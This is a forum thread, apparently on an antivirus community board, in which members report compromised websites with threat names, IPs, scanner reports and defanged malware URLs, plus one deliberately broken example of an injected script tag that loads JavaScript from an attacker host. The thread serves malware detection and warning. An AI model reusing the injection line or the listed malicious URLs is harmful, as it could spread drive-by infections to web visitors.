Other > Viruses and worms
Source of infection...
polonus:
Hi Pondus,
Now a Norwegian site that has this infection:
webactive24*at
Domain Hash b4a0ff422b989a8d382f1fbe8c5d2b0a
IP Address 213.188.130.108
IP Hostname linuxnl-www.active24.nl
IP Country NO (Norway)
AS Number 12994
AS Name Active ISP AS
Detections 7 / 19 (37 %)
Status DANGEROUS
Virus
Threat Name: Trojan.Malscript!html
Location: htxp://www.webactive24.at/
Drive-By Downloads
Threat Name: Trojan.Malscript!html
File name: c:\documents and settings\user\local settings\temporary internet files\content.ie5\ocieqgj3\webactive24[1].htm
Location: htxp://webactive24.at/
See the attached image of the malcode...
for lasio.ru see: http://www.google.com/safebrowsing/diagnostic?site=lasio.ru
polonus
Pondus:
VirusTotal - webactive24.at.htm - 28/41 ( Edit: WebSite is now CLEANED )
http://www.virustotal.com/analisis/5da6c6da967a4cb143a46ad9c27b9150e9d8435850064bc8ced16ca86d55f8ab-1276983902
polonus:
Hi another site with malscript infection found, this time Czech site:
Threat Name: Trojan.Malscript!html
Location: hxtp://www.krach-cz.cz/index.htm
Analysis: htxp://jsunpack.jeek.org/dec/go?report=636f126aa098d95c0adaa1df68f0abfdcab909c4
Found benign here, but is infected with Troj/JSRedir-AK
http://wepawet.iseclab.org/view.php?hash=ef241bff79db6f86ab6377f253308307&t=1277643265&type=js
Location: hxtp://www.krach-cz.cz/
Our avast av detects JS-Illredir-H here,
polonus
polonus:
Howdy malware fighters,
Here a list of dangerous subdomains:
http://safeweb.norton.com/report/show?url=oployau.fancountblogger.com.&x=13&y=10
sorydory.russellhowe.com. 3530 IN A 88.198.25.170
Threat Name: Bloodhound.Exploit.292
Location: htxp://sorydory.russellhowe.com:8080/Applet1.html
aospfpgy.dogplaystation.com. 2792 IN A 216.154.216.15
hreat Name: Bloodhound.Exploit.292
Location: htxp://aospfpgy.dogplaystation.com:8080/Applet1.html
kollinsoy.skyefenton.com. 399 IN A 194.150.236.199
Threat Name: Trojan.Malscript!html
Location: hxtp://kollinsoy.skyefenton.com:8080/HDMI.js
temp.hbsouthmomsclub.com. 1116 IN A 81.89.109.23
Threat Name: Trojan.Malscript!html
Location: htxp://temp.hbsouthmomsclub.com:8080/Notes1.pdf
The attack itself is nothing new. It uses stolen FTP credentials to inject malicious scripts into legitimate web pages. The injected scripts look like this:
--- Code: --- ^sc ript type="text/javascript" src="hxxp://oployau .fancountblogger .com:8080/YouTube*js"^^/sc ript^
<!--8469f3ebb36bebb12b39b0f9e7fe5933--^ code broken by me, pol
--- End code ---
polonus
polonus:
Hi malware fighters,
Another one: Threats found: 1
Here is a complete list:
Threat Name: Trojan.Malscript!html
Location: htxp://ee9kd.smartenergymodel.com/js/jquery.min.js
The last time suspicious content was found on this site was on 2010-07-08.
Malicious software includes 4 trojans, 4 exploits
This site was hosted on 2 network(s) including AS27473 (CIHOST), AS16276 (OVH).
Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, smartenergymodel.com appeared to function as an intermediary for the infection of 25 sitex including joby.cz/, cherokeestreetnews.org/, dixiequicks.com/.
Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 932 domains, including prettymematernity.com/, balioutbound.com/, turkescort.gen.tr/.
How did this happen?
In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message,
polonus
Navigation
[0] Message Index
[#] Next page
[*] Previous page
Go to full version